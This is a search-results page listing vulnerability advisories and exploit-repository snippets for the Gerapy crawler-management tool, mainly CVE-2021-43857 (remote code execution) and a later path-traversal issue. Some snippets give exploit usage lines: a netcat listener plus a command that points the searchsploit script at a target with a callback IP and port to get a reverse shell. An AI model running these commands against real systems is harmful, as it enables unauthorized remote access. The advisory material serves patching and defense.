133 matches found
CVE-2021-43857
CVE-2021-43857 Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8. CVE-2021-43857 is a vulnerability marked as Critical priority CVSS 9.8 leading to remote code execution. This vulnerability works on all versions prior to 0.9.8. Tested onl...
CVE-2021-43857
CVE-2021-43857 CVE-2021-43857 Gerapy command execution Disclaimer This script is for learning and reference only. Do not maliciously attack other people's websites. If you violate laws or regulations, all consequences shall be borne by the user. Technology is innocent and has nothing to do with t...
gerapy-cve-2021-43857
Gerapy CVE-2021-43857 Authenticated RCE This repository contains a proof of concept exploit for CVE-2021-43857 , a Remote Code Execution vulnerability affecting Gerapy -p -L -P Requirements 1. Python 3.x 2. requests and pyfiglet pip install requests pyfiglet 3. Netcat nc...
CVE-2021-43857-Gerapy-v0.9.7
CVE-2021-43857-Gerapy-v0.9.7 login to portal as admin add new project sudo nc -lvnp 80 searchsploit -m python/remote/50640.py python3 ./50640.py -t IP-TARGET/URL -p PORT-TARGET -L YOUR-KALI-LINUX-IP -P YOUR-LISTENER-PORT python3 ./50640.py -t 192.168.106.24 -p 8000 -L 192.168.45.202 -P 80 enjoy...
cve-2021-32849
cve-2021-32849 cve-2021-32849 Gerapy command execution Usage First start an nc listener, then use the exp to attack python3 CVE-2021-32849.py -u http://192.168.1.69:8000 -U admin -P admin@123 -r 10.10.16.34 -p 8888 -c id...
CVE-2026-105174
A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function projectcreate of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument projectname leads to path traversal. Remote exploitation of the attack is...
CVE-2026-105174 Gerapy Project Management views.py project_create path traversal
A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function projectcreate of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument projectname leads to path traversal. Remote exploitation of the attack is...
EUVD-2026-92154
A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function projectcreate of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument projectname leads to path traversal. Remote exploitation of the attack is...
CVE-2026-105174 Gerapy Project Management views.py project_create path traversal
A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function projectcreate of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument projectname leads to path traversal. Remote exploitation of the attack is...
CVE-2026-105174 Gerapy Project Management views.py project_create path traversal
A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function projectcreate of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument projectname leads to path traversal. Remote exploitation of the attack is...
CVE-2026-105174
A path traversal vulnerability exists in Gerapy up to version 0.9.13 within the Project Management component. The issue is located in the project_create function of the gerapy/server/core/views.py file, where improper handling of the project_name argument allows for unauthorized directory access....
CVE-2026-105174
A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function projectcreate of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument projectname leads to path traversal. Remote exploitation of the attack is...
CVE-2026-105174: Improper Limitation of a Pathname to a Restricted Directory
A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function projectcreate of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument projectname leads to path traversal. Remote exploitation of the attack is...
PT-2026-104663
A vulnerability has been found in Gerapy up to 0.9.13. This vulnerability affects the function project create of the file gerapy/server/core/views.py of the component Project Management. The manipulation of the argument project name leads to path traversal. Remote exploitation of the attack is...
gerapy (>=0.8.7, <=0.9.3a2), ora2 (2.4.4) potentially affected by CVE-2026-15307 via django (1.11.26)
django PYPI version 1.11.26 is affected by a known vulnerability. The following packages have a transitive dependency on django and may be impacted: - gerapy =0.8.7, =0.9.3a2 - ora2 2.4.4 Source cves: CVE-2026-15307 Source advisory: OSV:PYSEC-2026-4035...
bookscrape (>=0.0.1.dev1, <=0.0.2b7), gerapy (>=0.9.3b1, <=0.9.3) potentially affected by CVE-2026-84366 via scrapy (1.5.0)
scrapy PYPI version 1.5.0 is affected by a known vulnerability. The following packages have a transitive dependency on scrapy and may be impacted: - bookscrape =0.0.1.dev1, =0.9.3b1, =0.9.3 Source cves: CVE-2026-84366 Source advisory: OSV:PYSEC-2026-3918...
bookscrape (>=0.0.1.dev1, <=0.0.2b7), gerapy (>=0.9.3b1, <=0.9.3) potentially affected by CVE-2026-84366 via scrapy (1.5.0)
scrapy PYPI version 1.5.0 is affected by a known vulnerability. The following packages have a transitive dependency on scrapy and may be impacted: - bookscrape =0.0.1.dev1, =0.9.3b1, =0.9.3 Source cves: CVE-2026-84366 Source advisory: OSV:GHSA-76G3-C3X4-CRVX...
gerapy (>=0.9.5, <=0.9.6), scrapy-kk-plus (>=0.1.1, <=0.1.4) +5 more potentially affected by CVE-2026-84366 via scrapy (1.8.4)
scrapy PYPI version 1.8.4 is affected by a known vulnerability. The following packages have a transitive dependency on scrapy and may be impacted: - gerapy =0.9.5, =0.1.1, =0.1.0, =0.1.0, =1.1.0, =0.1.10, =0.1.12 Source cves: CVE-2026-84366 Source advisory: OSV:GHSA-76G3-C3X4-CRVX...
gerapy (>=0.8.7, <=0.9.3a2), ora2 (2.4.4) potentially affected by CVE-2026-15830 via django (1.11.26)
django PYPI version 1.11.26 is affected by a known vulnerability. The following packages have a transitive dependency on django and may be impacted: - gerapy =0.8.7, =0.9.3a2 - ora2 2.4.4 Source cves: CVE-2026-15830 Source advisory: OSV:GHSA-Q238-5CXM-5C9H...
gerapy (>=0.8.7, <=0.9.3a2), ora2 (2.4.4) potentially affected by CVE-2026-15307 via django (1.11.26)
django PYPI version 1.11.26 is affected by a known vulnerability. The following packages have a transitive dependency on django and may be impacted: - gerapy =0.8.7, =0.9.3a2 - ora2 2.4.4 Source cves: CVE-2026-15307 Source advisory: OSV:GHSA-WVQV-FJ8W-QMHM...